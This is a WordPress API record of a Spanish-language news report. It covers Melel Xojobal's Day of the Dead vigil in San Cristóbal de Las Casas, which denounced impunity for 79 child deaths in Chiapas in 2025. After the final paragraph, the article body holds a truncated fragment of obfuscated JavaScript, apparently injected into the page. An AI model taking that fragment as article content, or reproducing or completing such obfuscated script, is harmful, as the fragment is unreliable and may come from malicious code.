{"id":24851,"date":"2025-11-03T03:33:30","date_gmt":"2025-11-03T03:33:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24851"},"modified":"2025-11-03T03:33:31","modified_gmt":"2025-11-03T03:33:31","slug":"melel-xojobal-denuncia-impunidad-ante-muertes-de-ninas-ninos-y-adolescentes-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24851","title":{"rendered":"Melel Xojobal denuncia impunidad ante muertes de ni\u00f1as, ni\u00f1os y adolescentes en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"926\" height=\"617\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000416698.jpg\" alt=\"\" class=\"wp-image-24852\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000416698.jpg 926w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000416698-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000416698-768x512.jpg 768w\" sizes=\"auto, (max-width: 926px) 100vw, 926px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<br>2 de noviembre del 2025. San Crist\u00f3bal de Las Casas\u2013 En el marco de la conmemoraci\u00f3n del D\u00eda de Muertos, la organizaci\u00f3n Melel Xojobal llev\u00f3 a cabo la d\u00e9cima edici\u00f3n de la acci\u00f3n p\u00fablica \u201cMuerte Impune\u201d, una intervenci\u00f3n social que busca recordar a las ni\u00f1as, ni\u00f1os y adolescentes fallecidos por causas prevenibles o violentas, as\u00ed como exigir justicia ante la falta de respuestas institucionales.<\/p>\n\n\n\n<p>Durante el acto, la organizaci\u00f3n inform\u00f3 que en lo que va de 2025 se han registrado 79 muertes de menores de edad en el estado, entre ellas 49 por accidentes viales, 10 por homicidios, 6 por feminicidios y 14 por homicidios culposos. Estas cifras, se\u00f1alaron, evidencian un contexto de creciente vulnerabilidad y desprotecci\u00f3n hacia la ni\u00f1ez chiapaneca.<\/p>\n\n\n\n<p>Melel Xojobal subray\u00f3 que detr\u00e1s de cada caso hay omisiones y negligencias que permanecen impunes. \u201cLa impunidad de ayer es la impunidad de hoy; la de los imperios genocidas es la misma que la de los cacicazgos locales\u201d, expresaron durante la jornada.<\/p>\n\n\n\n<p>La organizaci\u00f3n tambi\u00e9n manifest\u00f3 su preocupaci\u00f3n por el incremento de la violencia feminicida que impacta directamente en ni\u00f1as y adolescentes, con casos recientes documentados en municipios como Frontera Comalapa, Ixtapa, San Crist\u00f3bal de Las Casas, San Juan Chamula, Mapastepec y Tuxtla Guti\u00e9rrez. Seg\u00fan datos de la Alerta de Violencia de G\u00e9nero en Chiapas, hasta septiembre 21 menores quedaron en orfandad a causa del feminicidio de sus madres.<\/p>\n\n\n\n<p>Asimismo, Melel Xojobal cuestion\u00f3 la eficacia de la estrategia gubernamental \u201cCero Impunidad\u201d, al considerar que no ha generado resultados visibles ni transformaciones reales en materia de justicia. En ese sentido, la organizaci\u00f3n hizo un llamado a colectivos, organizaciones sociales y ciudadan\u00eda a sumarse a la denuncia p\u00fablica y promover acciones comunitarias que garanticen la vida y seguridad de ni\u00f1as, ni\u00f1os y adolescentes.<\/p>\n\n\n\n<p>Durante la ceremonia simb\u00f3lica, integrantes de la organizaci\u00f3n encendieron velas y pronunciaron los nombres de las v\u00edctimas como un acto de memoria y exigencia. \u201cSi guard\u00e1ramos un minuto de silencio por cada una de estas muertes, permanecer\u00edamos callados una hora con diecinueve minutos. En lugar de eso, usamos nuestra voz para exigir un alto a la impunidad\u201d, expresaron.<\/p>\n\n\n\n<p>Entre los nombres recordados estuvieron Said, Perla Allyson, Rosa Valeria, Deysi Guadalupe, Loisel, Axel, Fabiola Esmeralda, Marbeli Mabeli, Denis Misael, Eliud Antonio, Alfred Hazael y Elv\u00edn, s\u00edmbolos de una infancia que la violencia arrebat\u00f3 y que hoy se convierte en motivo de lucha por la justicia y la memoria.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal2 de noviembre del 2025. San Crist\u00f3bal de Las Casas\u2013 En el marco de la conmemoraci\u00f3n del D\u00eda de Muertos, la organizaci\u00f3n Melel Xojobal llev\u00f3 a cabo la d\u00e9cima edici\u00f3n de la acci\u00f3n p\u00fablica \u201cMuerte Impune\u201d, una intervenci\u00f3n social que busca recordar a las ni\u00f1as, ni\u00f1os y adolescentes fallecidos por causas prevenibles o &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24852,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24851","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24851","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24851"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24851\/revisions"}],"predecessor-version":[{"id":24853,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24851\/revisions\/24853"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24852"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24851"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24851"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24851"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}